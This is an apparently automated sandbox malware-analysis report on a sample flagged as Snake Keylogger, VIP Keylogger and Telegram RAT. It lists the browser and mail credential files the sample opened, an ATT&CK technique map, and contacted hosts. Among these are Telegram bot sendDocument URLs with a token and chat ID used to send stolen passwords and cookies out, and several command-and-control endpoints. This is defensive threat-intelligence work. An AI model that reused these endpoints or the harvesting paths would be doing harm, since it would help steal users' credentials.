Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Kb94RzMYNf.exe

Code function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406072

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match	File source: 00000005.00000002.2599404721.0000000021DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	31 Virtualization/Sandbox Evasion	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	25 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Kb94RzMYNf.exe	72%	Virustotal		Browse
Kb94RzMYNf.exe	53%	ReversingLabs	Win32.Spyware.Snakekeylogger
Kb94RzMYNf.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe	53%	ReversingLabs	Win32.Spyware.Snakekeylogger

Source	Detection	Scanner	Label
http://abraher.com	0%	Avira URL Cloud	safe
http://mail.abraher.com	0%	Avira URL Cloud	safe
http://www.skinstudio.netG	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
abraher.com	82.194.91.193	true	true	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
drive.google.com	142.250.184.238	true	false	high
drive.usercontent.google.com	142.250.181.225	true	false	high
reallyfreegeoip.org	104.21.16.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
mail.abraher.com	unknown	unknown	true	unknown
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:048707%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20048707%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	msiexec.exe, 00000005.00000002.2599404721.0000000021E9D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.office.com/P	msiexec.exe, 00000005.00000002.2599404721.0000000021E8E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://abraher.com	msiexec.exe, 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:048707%0D%0ADate%20a	msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lB	msiexec.exe, 00000005.00000002.2599404721.0000000021E98000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/N	msiexec.exe, 00000005.00000002.2582024062.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.00000000004FF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mail.abraher.com	msiexec.exe, 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Kb94RzMYNf.exe, Kb94RzMYNf.exe.2.dr	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000005.00000002.2599404721.0000000021E6C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DB4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021E5D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021E9D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.skinstudio.netG	Kb94RzMYNf.exe, Kb94RzMYNf.exe.2.dr	false	Avira URL Cloud: safe	unknown
http://varders.kozow.com:8081	msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171	msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	msiexec.exe, 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 00000005.00000002.2582024062.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.00000000004FF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/A	msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 00000005.00000002.2599404721.0000000021E67000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000005.00000002.2599404721.0000000021D6B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021D26000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	msiexec.exe, 00000005.00000002.2599404721.0000000021D6B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021CFC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enP	msiexec.exe, 00000005.00000002.2599404721.0000000021E5D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://api.telegram.org	msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000005.00000002.2599404721.0000000021CFC000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.16.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
142.250.181.225	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
142.250.184.238	drive.google.com	United States	15169	GOOGLEUS	false
82.194.91.193	abraher.com	Spain	16371	ACENS_ASSpainHostinghousingandVPNservicesES	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588331
Start date and time:	2025-01-11 00:05:30 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Kb94RzMYNf.exe renamed because original name is a hash value
Original Sample Name:	f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/13@6/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 89% Number of executed functions: 71 Number of non-executed functions: 45
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
18:06:28	API Interceptor	39x Sleep call for process: powershell.exe modified
18:07:33	API Interceptor	2658x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
104.21.16.1	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
104.21.16.1	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
132.226.247.73	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	6ZoBPR3isG.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	JgE2YgxSzB.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	upXUt2jZ0S.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	2CQ2zMn0hb.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	240815025266174071.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	hgq5nzWJll.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	13.107.246.45
	WN9uCxgU1T.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.45
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	13.107.246.45
	Qz8OEUxYuH.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	ztcrKv3zFz.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	3j7f6Bv4FT.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
reallyfreegeoip.org	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
api.telegram.org	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
CLOUDFLARENETUS	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	Gz2FxKx2cM.exe	Get hash	malicious	FormBook	Browse	104.21.36.62
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.184.241
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
UTMEMUS	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	9Yn5tjyOgT.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
ACENS_ASSpainHostinghousingandVPNservicesES	db0fa4b8db0333367e9bda3ab68b8042.spc.elf	Get hash	malicious	Mirai, Gafgyt	Browse	109.70.39.177
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	176.28.123.52
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	77.240.124.207
	https://desactivacion-correo.s3.eu-north-1.amazonaws.com/es.html	Get hash	malicious	Unknown	Browse	217.116.0.245
	jew.x86.elf	Get hash	malicious	Unknown	Browse	81.46.244.159
	x86_64.elf	Get hash	malicious	Mirai	Browse	109.70.39.189
